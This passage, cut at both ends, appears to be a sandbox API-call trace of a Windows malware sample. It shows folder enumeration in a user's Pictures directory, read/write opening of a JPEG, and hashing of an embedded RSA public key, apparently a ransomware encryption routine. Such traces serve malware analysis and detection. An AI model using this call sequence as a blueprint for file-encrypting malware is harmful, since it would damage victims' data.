lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0201.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0201.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.708] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\") returned="yDPh4CpXgP3QwyUC\\" [0201.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0201.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0201.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.708] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\") returned="KiR-tAs9lgdEh FXubwY\\" [0201.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8ff18 [0201.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0201.708] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0201.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8ff18 | out: hHeap=0x620000) returned 1 [0201.709] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0201.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.709] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.710] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.710] PathFindFileNameW (pszPath="") returned="" [0201.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.710] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2b709b0, ftCreationTime.dwHighDateTime=0x1d8a613, ftLastAccessTime.dwLowDateTime=0x4660df40, ftLastAccessTime.dwHighDateTime=0x1d8a65e, ftLastWriteTime.dwLowDateTime=0x4660df40, ftLastWriteTime.dwHighDateTime=0x1d8a65e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0201.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.713] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2b709b0, ftCreationTime.dwHighDateTime=0x1d8a613, ftLastAccessTime.dwLowDateTime=0x4660df40, ftLastAccessTime.dwHighDateTime=0x1d8a65e, ftLastWriteTime.dwLowDateTime=0x4660df40, ftLastWriteTime.dwHighDateTime=0x1d8a65e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.713] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c98e060, ftCreationTime.dwHighDateTime=0x1d8a4d9, ftLastAccessTime.dwLowDateTime=0x20874a0, ftLastAccessTime.dwHighDateTime=0x1d8a651, ftLastWriteTime.dwLowDateTime=0x20874a0, ftLastWriteTime.dwHighDateTime=0x1d8a651, nFileSizeHigh=0x0, nFileSizeLow=0x29b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AoUGFR90ajW.jpg", cAlternateFileName="AOUGFR~1.JPG")) returned 1 [0201.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0201.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0201.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0201.713] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\AoUGFR90ajW.jpg") returned=".jpg" [0201.713] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\AoUGFR90ajW.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\aougfr90ajw.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.714] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=10675) returned 1 [0201.714] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.717] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x298d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.717] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.720] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.720] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x29b3, lpOverlapped=0x0) returned 1 [0201.721] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.721] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.721] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.721] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0201.722] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.722] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.722] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.722] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.722] GetLastError () returned 0x0 [0201.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.722] GetLastError () returned 0x0 [0201.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.723] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.723] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0201.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.723] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.723] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.723] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x29b0) returned 0x2ea99b0 [0201.724] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8ff18 [0201.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34b8 [0201.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8ff60 [0201.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34d0 [0201.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3500 [0201.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3560 [0201.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3518 [0201.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.725] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3560 [0201.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0201.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3518 [0201.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3500 [0201.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0201.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0201.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0201.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0201.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.729] GetCurrentThreadId () returned 0x66c [0201.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8b38 [0201.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0201.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.730] GetCurrentThreadId () returned 0x66c [0201.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3560 [0201.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3500 [0201.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0201.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3518 [0201.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34e8 [0201.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3578 [0201.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0201.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3548 [0201.734] HeapFree (in: 